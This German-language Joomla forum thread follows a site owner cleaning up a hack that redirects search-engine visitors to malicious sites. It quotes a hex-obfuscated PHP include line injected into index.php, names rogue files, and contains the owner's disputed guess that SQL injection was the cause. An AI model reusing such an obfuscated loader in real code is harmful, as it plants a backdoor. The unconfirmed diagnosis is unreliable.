hack? links nach google-recherche leiten auf jahoo-japan weiter

Hallo cardamon,

durch ein Update beseitigst du keinen Hack.
Du musst die Schaddateien finden und löschen.
Allerdings musst du schon Profi sein, um das zu bereinigen.
Ausserdem musst du deinen PC untersuchen, ob da nicht auch
schon Backdoors vorhanden sind (FTP).

Des Weiteren würde ich die Seite professionell bereinigen lassen oder
den kompletten Webspace und die DB löschen und ein sauberes Backup
einspielen oder die Seite neu aufsetzen.

Beim Hack verfahre bitte hiernach:

https://www.fc-hosting.de/joomla/tips-joomla-gehackt.php

Hallo

Es gab da mal Hacks die eine "Weiche" in die index.php des jeweiligen Systems geschrieben haben. Da wurden dann Besucher von Suchmaschinen - und nur von diesen - auf andere Seiten im Ausland umgeleitet. Bemerkt man im ersten Moment auch nicht, da man sich selbst ja eher selten bei Google und Co. anklickt. Ich meine mich aber zu erinnern, etwas Ähnliches auch schon mal in der .htaccess gefunden zu haben. Wenn Du den Hack auf Deiner Seite bereinigst, also bitte auch diese versteckte Datei berücksichtigen. Du kannst in deinem FTP-Programm in den Optionen auswählen das versteckte Dateien angezeigt werden sollen.

Gruß Jan

Hallo,

habe mich hier im Forum angemeldet, in der Hoffnung einige Hinweise zu bekommen. Ich betreue eine Business-Seite, wo Links nach Google-Suche ebenfalls weitergeleitet werden. Es gibt dazu massive Hinweise von Usern und Kunden. Ich selbst habe das erst festgestellt, nachdem ich den Test mit bereinigten Browsern vorgenommen habe. Dabei erfolgt die Umleitung einmal auf eine RU-Seite mit Malware (win.mobile.installs.com) und zweitens auf eine RU-Pornoseite. Den letzteren Link erspare ich mir. Zur Sicherheit von User und Kunden habe ich das gesamte System offline genommen und ein klassische HTML-Seite vorgeschaltet. Gibt es außer den bereits geschilderten Ansätzen weitere Hinweise? Joomla selbst sagt mir, dass die aktuelle Version installiert ist. Allerdings sind noch 2 Drittanbieter-Module offen (ARI und Gästebuch).

Danke und Gruß
Wolfgang

Hallo Wolfgang,

Was ist denn die angezeigte "aktuelle Version"? Hast du einmal die index.php geprüft bzw. mit einer sauberen Version verglichen?
Da du nicht der einzige bist mit dem Problem, gibt es hierzu auch einige Anleitungen im Netz.

Folgende Suchwörter führen "joomla google suche umleitung fremde webseite" bringen einige Ergebnisse. Link

Gruß Frank

Hallo Frank,

danke für die Anteilnahme und den Link. Die aktuelle Version ist 3.6... wenn ich nicht irre. Kann konkret ja nicht nachsehen, da ich nur FTP Zugriff habe. Bin dabei die Dateien zu vergleichen. Normal beginnt die index.php ja mit:
"/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/"
Darüber finde ich nun eine neu Zeile:
"include "\x2fhom\x65/st\x72ato\x2fhtt\x70/pr\x65miu\x6d/ri\x64/24\x2f89/\x35371\x32489\x2fhtd\x6fcs/\x6cibr\x61rie\x73/fo\x66/da\x74aba\x73e/c\x6fde.\x70hp";"

Damit kann ich echt nix anfangen! Oder gibt es eine Erweiterung, die mir entgangen ist?

Gruß
Wolfgang

Hallo Frank,
noch etwas vergessen. Dazu passend liegt im Rootverzeichnis eine 404-Seite (404.money.php). Die habe ich da noch nie gesehen und taucht auch in keiner der Sicherungen auf. Ich denke, eine scripseitige Umleitung, die diese Seite erzeugt. Für den Server war es das dann .

Gruß
Wolfgang

es gibt nun 2 Möglichkeiten... alles neu erstellen oder einen Profi beauftragen... von denen treiben sich hier ja welche rum.

Hallo Frank,

danke für die "Lösungsvorschläge"!
Aber ein Problem einfach aus der Hand zu geben, nur weil die Lösung nicht gleich in Sichtweite ist, war noch nie mein Ding. Ich bin sicher, dass ich das löse. Im Notfall bleibt dein erster Vorschlag. Der läuft ja nicht weg! Erst einmal sind alle Zugangsdaten geändert. zweitens, versuche ich noch ein saubere Backup zu bekommen. Ich denke, das Tor ist im ARI - Systemmanager. Ich melde mich, wenn ich die Schwachstellen identifiziert habe. Das sollte mein Kopf noch hergeben

Gruß
Wolfgang

Möglichkeiten Schadcode zu verstecken gibt es leider viele. So lange Du die ursprüngliche Sicherheitslücke nicht gefunden hast, und definitiv alle Veränderungen nachvollziehen und Rückgängig machen konntest, ist die Geschichte quasi ein Fass ohne Boden. Wichtig ist halt, dass Du erkennen kannst was potenzieller Schadcode ist, welche Dateien etwas in dem jeweiligen Verzeichnissen zu suchen haben, also "echt" sind, sowie die Kenntnis wie man Logdateien liest und was die einzelnen Einträge zu bedeuten haben. Eine feste Anleitung / HowTo oder Liste die man einfach abarbeitet gibt es nicht. Auch wenn die Hacks meisten automatisiert vorgenommen werden, fügen die Personen die diese gehackten Seiten dann als Pakete kaufen, den Schadcode nach ihrem eigenen Geschmack und konkreten Anforderungen ein. Bei manchen ist es eine Mailer, bei anderen eine Phishing-Site, und wieder andere machen halt das Spiel mit den Weiterleitungen.

Gruß Jan

E R F O L G !!!

Danke Euch für die rege Anteilnahme und Hinweise. Ganz klar ist mir noch nicht, wie der Zugriff auf die Seite erfolgen konnte. Offensichtlich aber geschehen, als die ältere Version noch installiert war. Meine Vermutung geht in Richtung Joomla-Cache. Wie bereits geschrieben, wurde ständig eine money.php nach Aufruf der index.php über einen entsprechenden Eintrag kreiert. Die Quelle war die wp-sys.manager.php im ARI Images-Slider-Verzeichnis. Diese schaltete eine 404.money.php in das Startverzeichnis und leitete dann um. Gleichlautende Sites konnten noch im Template-Verzeichnis festgestellt werde. Die Seite läuft wieder schnell und stabil. Link sende ich gern. Aber ich denke, dass ist hier nicht erwünscht.

Neu sitzt jetzt die 3.4.8 auf dem Server. Laut Joomla ist das die aktuelle Version obwohl ja eigentlich die 3.6.4 raus ist. Verstehe ich nicht ganz. Sollte ich noch aktualisieren? Wie ich aber gelesen habe, gibt es Probleme beim Einspielen des Updates.

Danke und Gruß
Wolfgang

Zitat von ITA-Marketing

Sollte ich noch aktualisieren?

Aber unbedingt (s.hier)!!!

Probleme beim Update treten in den wenigsten Fällen auf, und selbst dann gibt es immer eine Lösung. Aber ein Update nicht einzuspielen, nur weil es Probleme geben könnte, ist mit Sicherheit keine Option .

Hallo Anka,

da gebe ich dir natürlich voll Recht. Die Frage ist mehr, ob Kunden auch einen Wartungsvertrag abschließen. Für die eigene Seite mag das sicher gelten, für letzteren Fall aber weniger. Es ist dann eine Kundenentscheidung und dieser trägt auch das Risiko und die Kosten!

Gruß
Wolfgang

Nochmals in der Sache...

Leider zu früh gejubelt. Die Seite lief nur kurz ohne Probleme. Danach war der alte Schad behaftete Zustand wieder da. Alle Backups (STRATO) nützen nichts, da offensichtlich der Hack schon lange implementiert ist. Man sucht sich ja nicht selbst bei Google und so blieb die Sache bis zum Zeitpunkt der Kundeninformationen im Verborgenen.
Nachdem ich mich etwas intensiver damit beschäftigt habe, bin ich sicher, dass es sich nur um einen klassischen Fall von „SQL-Injection“ handeln kann. Als Einfallstor kommen eigentlich aus meiner Sicht nur folgende Faktoren in Betracht:

1. Lücken in Joomla selbst

• URL-Parameter
• Cookiewerte

2. Verspätet Updateinstallation, zum Schließen der Lücke (leider versuchen Kunden oft einen Wartungsvertrag der Seite auszuschließen)
3. Dritt-Module, die hier im speziellen Fall wären:

• ARI-Imagesslider (Banner)
• BreezingsForms (Formulareditor)
• Easybook Reloadet (Gästebuch)

Aufgrund des Musters des Angriffes, kann sicher der ARI Imagesslider ausgeschlossen werden. Durch die hexadezimale Codierung des Schadcodes schließe ich darauf, dass es sich nur um eine persistente oder nicht persistente „SQL-Injection“ handelt. Ich vermute deshalb Lücken in BreezingForms oder Easybook Reloadet. Entweder war es möglich den Schadcode direkt anstatt des Gästebucheintrages in der Datenbank durch eine XSS-Lücke zu speichern (persistente Injection) oder mit dem Formular wurde Schadcode an mich und einen zweiten User mit höheren Rechten gesendet. Allerdings hätte wir dann noch eine speziell präparierte Website besuchen müssen.

Meine Fragen sind deshalb:

1. Welche von den Joomlaentwicklern geprüften Alternativen gibt es zu den 3 genannten Modulen.
2. Erfolgt generell eine Prüfung von Drittanbieter-Modulen, die hier im Forum empfohlen werden?
3. Ist es möglich, die Datenbank zumindest in Teilen noch zu verwenden und wer würde das zu welchem Preis ausfiltern (Einträge Gästebuch mit Leistungsbewertung)
4. Macht es Sinn, SSEQ_lib unter Joomla für eine zusätzliche Prüfung aufzusetzen (kenne das von xtc_modified)

Für Eure Mithilfe wäre ich sehr Dankbar.

Gruß
Wolfgang

Wie soll denn Schadcode aus der DB in eine Datei gelangen?! Du kennst nun das Datum des Hacks, einfach mal die Zugriffslogdateien analysieren. Ich habe mit sehr vielen Webseiten zu tun, bisher ist mir bei noch keiner aufgefallen, dass die von dir genannten Erweiterungen unsicher wären. Es ist auch nicht selten, dass Installationen mehrfach gehackt werden, und wenn eine Installation nicht bereinigt wurde, wird der Code über längere Zeit einfach mitgeschliffen. Die Scanner der Hoster sind oft nicht auf dem aktuellen Stand, und wenn dieser dann mal mit neuen Phrasen gefüttert wird, kann es durchaus passieren, dass plötzlich dort die Alarmglocken angehen, obwohl der Code schon lange vorhanden war. Es kommt auch vor, dass es länger dauert, bis die präparierte Installation von Hackern missbraucht wird, es gibt einen regen Markt für kompromittierte Webapps wie Joomla, die werden dann "im Dutzend" an zwielichte Interessenten verkauft. Ich wette, die Installation war schon länger gehackt, und ist nie ordentlich bereinigt worden.

Zitat

1. Welche von den Joomlaentwicklern geprüften Alternativen gibt es zu den 3 genannten Modulen.

Joomla Entwickler prüfen keine Erweiterungen. Es gibt aber eine Liste von unsicheren Erweiterungen https://vel.joomla.org/live-vel

Zitat

2. Erfolgt generell eine Prüfung von Drittanbieter-Modulen, die hier im Forum empfohlen werden?

Nein. Dies ist ein öffentliches Forum. Jeder kann hier posten was er will, solange es nicht gegen Forenreglen verstößt.

Hallo Chris,

ich meine schon rein beim Betrachten der Seite wird der Schadcode ausgeführt und an den Browser des Betrachters übermittelt, wenn er einmal in der Datenbank abgespeichert ist. Wie er in die index.php kommt tappe ich selbst noch im dunkeln. Ich gehe davon aus, dass ein js.Script nachinstalliert worden ist. Wenn er die Rechte erlangt hat, ist das doch kein Problem. Jedenfalls wird der oben genannte Eintrag auch nach dem Löschen wieder in die Datei geschrieben. Bin da auch nicht so ein Experte und arbeite mich Schritt für Schritt vor. Parallel habe ich ein sauberes 3.6.4 mit zwei Faktoren Authentifizierung aufgesetzt. Alles weitere geschieht hier local. Obwohl ich beispielsweise zum Test die Dateien 404money.php und Money.php gelöscht hatte, zeigen die log. Dateien des Servers (Provider) das verschieden Befehle ausgeführt werden (mkdir, creat etc.) und die Dateien werden wieder angelegt, ohne dass ich auf die Seite zugreife. Ich kann deine Annahme aber bestätigen, das der Hack schon eine Weile zurückliegt. Eine Bereinigung wurde auch nicht vorgenommen, sondern erst nach Providermail Anfang 2016 ein Update vorgenommen. Das dies über eine kompromittierte Installation erfolgt ist, davon hatte ich natürlich keine Ahnung. Einen verdächtigen Eintrag habe ich heute in der SQL-DB in 2014 gefunden. Dem gehen wir gerade nach. Wie meinst du das, mit ....mitgeschliffen? . Das Ganze ist mir jedenfalls noch nie untergekommen, obwohl ich schon paar Jahre auf dem Buckel habe.
Sag, gehört TinyURL eigentlich zur Standardinstallation von Joomla?

Gruß
Wolfgang

Hallo Christiane,

danke für den Hinweis und den Link. Habe mir das so in etwa schon gedacht. Hätte mich auch gewundert.

Gruß
Wolfgang

Zitat von ITA-Marketing

... 404money.php und Money.php ...

Ich gehe einfach momentan mal davon aus, dass das nicht die einzigen Dateien mit Schadcode waren. Es mögen noch woanders welche liegen oder joomlaeigene Dateien manipuliert worden sein, die (auch) als Backdoor genutzt werden können.
Kurz und bündig: https://www.fc-hosting.de/joomla/tips-joomla-gehackt.php

Zitat

Sag, gehört TinyURL eigentlich zur Standardinstallation von Joomla?

nein